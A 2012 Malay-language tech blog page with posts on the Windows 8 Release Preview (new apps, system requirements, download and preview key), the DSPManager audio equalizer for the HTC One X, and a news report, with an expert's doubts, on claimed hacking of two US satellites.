Lain aplikasi baru dalam siaran media ini termasuk aplikasi Travel Bing, serta Permainan dan Muzik Xbox aplikasi yang bersepadu dengan perkhidmatan muzik Zune Microsoft. Apa lagi, anda boleh mendapat beratus-ratus aplikasi baru dan dikemaskini dalam kedai Gedung Windows. Pelepasan Windows 8 RC datang berikutan keadaan apabila jualan PC perlahan kerana pengguna membeli telefon pintar dan tablet lebih PC. Tetapi, kepelbagaian Windows 8 dijangka melahirkan generasi baru komputer yang sebahagian komputer riba dan tablet sebahagian..

Sistem operasi..:

Windows 8 Release Preview works great on the same hardware that powers Windows 7:
- Processor - 1 gigahertz (GHz) or faster..
- RAM - 1 gigabyte (GB) (32-bit) or 2 GB (64-bit)..
- Hard disk space - 16 GB (32-bit) or 20 GB (64-bit)..
- Graphics card - Microsoft DirectX 9 graphics device with WDDM driver..
Additional requirements to use certain features:
- To use touch, you need a tablet or a monitor that supports multitouch...
- To access the Windows Store and to download and run apps, you need an active Internet connection and a screen resolution of at least 1024 x 768...
- To snap apps, you need a screen resolution of at least 1366 x 768...
- Internet access...

Giveaway:
1.Windows 8 Release Preview English 32-bit (x86) Download:Window 8 English 32Bit (2.5GB)..
2.Windows 8 Release Preview English 64-bit (x64) Download:Window 8 English 64Bit (3.3GB)..
3.Windows 8 RC Product Key:
                      TK8TP-9JN6P-7X7WW-RFFTV-B7QPF
P/S:Ada apa-apa komen dibawah..

DSPManager For HTC One X [And Other Android Smartphone]


HTC One X dan beberapa model sebelumnya memang diketahui sebagai pelopor kepada smartphone yang menyokong Beats Audio, iaitu sejenis audio enhancement, custom equalizer yang telah diasaskan oleh Dr.Dre.

Meskipun begitu, bagi mereka yang menggunakan CyanogenMod, pasti tahu terdapat sebuah equalizer yang mampu memberikan pengalaman muzik terhebat yang diberi nama sebagai DSPManager.

Setelah mencuba DSPManager yang digabungkan bersama kekuatan Beats Audio, saya tidak ragu untuk menyatakan yang saya tidak menyesal dengan pilihan saya untuk membeli HTC One X. Pengalaman muzik dengan hentakan drum dan petikan bass terasa hidup, dan setiap petikan gitar serta rhythm berirama bersama dengan vokal, terasa begitu hebat sekali.

Apa yang bagusnya mengenai DSPManager, ia memberikan pilihan untuk kita membuat tetapan bagi internal speaker supaya bunyinya lebih baik dari biasa.


Untuk HTC One X, anda boleh rujuk laman ini bagi tujuan muat turun dan cara pemasangan : [APP] DSPManager - Improve Audio

Untuk Smartphone selain One X, anda boleh rujuk laman ini : [APP] DSP Manager - Audio Enhancement

02 June 2012

Penggodam Mengambil Alih Dua Satelit Untuk Beberapa Minit




Menurut satu laporan Amerika Syarikat baru-baru ini mendakwa penggodam telah berjaya untuk campur tangan dengan dua satelit tentera, tetapi seorang pakar berpendapat jumlah tenaga yang diperlukan akan menjadi lebih besar untuk penggodam biasa.Penggodam mengambil kawalan Landsat-7 dan Terra AM-1 satelit untuk sejumlah besar masing-masing 12 minit dan dua minit.Seseorang mungkin berharap bahawa satelit komunikasi yang digantung di orbit di atas bumi mungkin menjadi salah satu komponen infrastruktur teknologi planet yang selamat daripada ada gangguan. Tetapi sebagai satelit komunikasi penggemar Paul Marsh dijelaskan di London acara B-belah Keselamatan pada bulan April, ada sebab untuk meragui laporan. Beliau bercakap mengenai cerita yang sama, yang dilaporkan pada akhir 1990-an, kira-kira penggodam yang kononnya mengakses UK tentera satelit komunikasi rangkaian SkyNet dan 'nudging' satu satelit keluar selari.Sama ada penggodam Cina mempunyai keupayaan yang kini hanya satu lagi perkara spekulasi untuk menambah bidang legap peperangan siber..


Sumber